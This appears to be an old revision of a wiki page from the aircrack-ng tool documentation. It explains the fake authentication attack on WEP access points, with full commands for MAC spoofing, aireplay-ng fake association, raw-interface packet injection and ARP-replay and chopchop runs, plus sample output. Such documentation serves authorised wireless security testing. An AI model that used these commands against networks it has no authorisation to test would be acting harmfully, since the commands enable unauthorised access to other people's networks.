User Tools

Site Tools


This is an old revision of the document!

Fake authentication

This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However it is genereally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests.

Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

With patched madwifi-old CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:

ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, setup the periodic re-association delay:

aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

If this attacks seems to fail (aireplay-ng keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

  • You are close enough to the access point.
  • The driver is properly patched and installed.
  • The card is configured on the same channel as the AP.
  • The BSSID and ESSID (-a / -e options) are correct.
  • If Prism2, make sure the firmware was updated.
fake_authentication.1163949138.txt.gz · Last modified: 2007/02/27 22:07 (external edit)